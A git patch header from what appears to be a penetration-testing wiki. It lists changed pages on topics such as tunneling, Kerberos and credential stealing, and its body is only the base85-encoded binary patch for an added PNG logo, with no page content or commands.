From b8b4c413da845f47829fbde053a310b82b3f6542 Mon Sep 17 00:00:00 2001
From: CPol
Date: Sun, 8 May 2022 23:13:03 +0000
Subject: [PATCH] GitBook: [#3195] No subject

---
 .gitbook/assets/SB logo black_034525.png      | Bin 0 -> 152489 bytes
 README.md                                     |  13 +-
 .../linux-forensics.md                        |  88 ++++++------
 .../shells/full-ttys.md                       |  27 ++--
 .../tunneling-and-port-forwarding.md          | 131 ++++++++++--------
 .../android-app-pentesting/smali-changes.md   |  48 ++++---
 .../113-pentesting-ident.md                   |  34 +++--
 .../2375-pentesting-docker.md                 |  14 ++
 .../5353-udp-multicast-dns-mdns.md            |  14 ++
 .../554-8554-pentesting-rtsp.md               |  15 +-
 .../873-pentesting-rsync.md                   |  14 ++
 .../pentesting-finger.md                      |  41 +++---
 .../pentesting-rpcbind.md                     |  34 +++--
 network-services-pentesting/pentesting-vnc.md |  14 ++
 .../pentesting-web/nginx.md                   |  66 +++++----
 .../url-format-bypass.md                      |  32 +++--
 .../pentesting-kubernetes-from-the-outside.md |  14 ++
 .../reversing-tools-basic-methods/README.md   |  16 ++-
 .../asreproast.md                             |  26 ++--
 .../kerberos-authentication.md                |  30 ++--
 windows-hardening/ntlm/smbexec.md             |  26 ++--
 .../stealing-credentials/README.md            |  78 ++++++-----
 .../rottenpotato.md                           |  25 ++--
 23 files changed, 519 insertions(+), 281 deletions(-)
 create mode 100644 .gitbook/assets/SB logo black_034525.png
diff --git a/.gitbook/assets/SB logo black_034525.png b/.gitbook/assets/SB logo black_034525.png new file mode 100644 index 0000000000000000000000000000000000000000..edec3d46ada123688d0bac2ceab6d29e6700e92f GIT binary patch literal 152489
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

e-NP&0cVg$pd_i@hmrgnCxUy9W=ryr zoq`^eoKl{;Ks0U=&#-)o^+?KkUq%OrZO^w-k(YO z>K2V|Rm2%I5#Y}hc`2X<3LMDZuvESazan-;%(In__l=*tJp78@0UQ+2DDdKYvm}DWPqo zI>r{}^}BV<07bw#>U=%>-IJh+wu!jO{bKf^SsCk_pX`u5k(E%B^G70DMmQOG90ss+ zXGj=(<^HGNW<71@vGQ?@1d2)V8+0FdJ{|^nDjnSbWowKkAR%3Edqqsw z@3N?+CL3!-Fc86uU-H!{@NVzg=|}9Q(le22k;m4eZ1HW4Mf(_I!&nR34$$XNV`#^w zFwEWV4VLGx!JHbZlcTAvCaq$zJI~KIf7c4nMG;#)pBA05*=_5NracI$|77lxR*F>ESv=IJYt|KpBFJDmL<>Silthld5(ua1??;^tp{P59(QZhX+&?y=OZ>Z`J ze32f}sP5{N2rn!A_0N!Z;1i6Y&d^TH?!X;d$ybAT(;<@=w@>UdcR#y@t4#^G9)m8c zVTybxu>A27wTFRGPQ8Su^(KwvD@8Bx+%+)v zP3a<|&l7tg{DxO`*C^2;yjN>u{|A-SovCbO|4XkGM>TdHv?9lmB{5OCYjaC#DqsdR zWcr&!64@X3-- zE%>Lrn@$1sLW&*ynrVP^TG`HEJHxs|WlJM;Ktu@Zd4 zNsnzM=9G~8-P{_HcVZoy>1W^HqVr3M?-uTJ6ZajI=0CGdW;)pEbLZ5&vTXD^s(*e| zkEKc^*rSAzRmkITMzMEe@9B|P#mmhE;*%+B_xZlWQ!e^HT~y;=(nYXp&XY+DV_Y*D zP>8;1=*7cW`}1PwsOX0OftEL+L}Z7SAh#^~dsyDgh+d+@7ncOV*`b`(&rjJ@-o;O% zfT8Ba^Q=4bPDXYSCR;#+0lF@+F0C%5E{-mtE~>7`4-OUVZj?&&A3x7dwb+Q)jSrb# z%9XUbjtxKtAS*BtY)nmU6{8|=LjBUS-F^t$l&dNk`jhxlSc->nr53_3w*RTUj;>mH zRC?;5-Y5H=t;WQ_`qG|3(aNbn($dPZiX|p36SI<@p>PP^)J*t~o+z&g^#n#auu}D_ zK>r=8d3mnZLK1f`{J~71d}48NnE5-KKb6CSzjcE$)fo$Ti^R4XUdW=!g-kIo?%9U7Uxs>G@|xNlRaU3xGk zCaQ^e!f`zqer_5hd{m6`=}Fk^tPL!lf@{F8=8Bl*)h9CE-2Pd1C{THzf|p4BBnefd zw9=vkmXQlO3Dp`qWaP-i>Y>%z>y0T_H5||I{x8jqKd@3F6%hNvAR6W0a%J3OEb=J(Zj< zE%~Y?wRZf&^*6^+sk&ddJvq9M965EVk6&xVW_V@eH-0vLH(b~nsX2U~UEy2Q{`tLI z+@|vL?*n*<;d~wZ$q(yUkH5ukovj?(AIa$y3`92uiQ>Qc^Tz-CJ1bs&ijot9)9@q2 z#0Ar^u$r>E)Fws8-Y&-Hh>3fiGbL`HlXEZbg6CtYO~Al6KL68^;8XtoX>s?U&kflz zwxDCYFm=uRSDe9|vYcr>PO7_vRpMPJugn`zeGHbfZ1>S>;UxN4Ca=Rqo$h-QdiUR# z6_h{QFedUP&JbdjI~a$58rm@Mpw`c7bi)_J{ z_h;19E=~NuFZ%Ooti=4OiZe6K-xDW@M1O({w2ErqU3t5DA!p^dg_`zgn+BmGyh7BT(6)z*ma`t8;xqbB4B1^~D z#!Lu;{`p)5@VPphn;eaiSr} z)YrJ4QUC8d^h(yuf$~F;15Iu`hwXlyn2Ql&p@Z`{^!V;kt7Px>-iy^fOYzpt9ZF{ZA+UGO?OI}^#@aPz! 
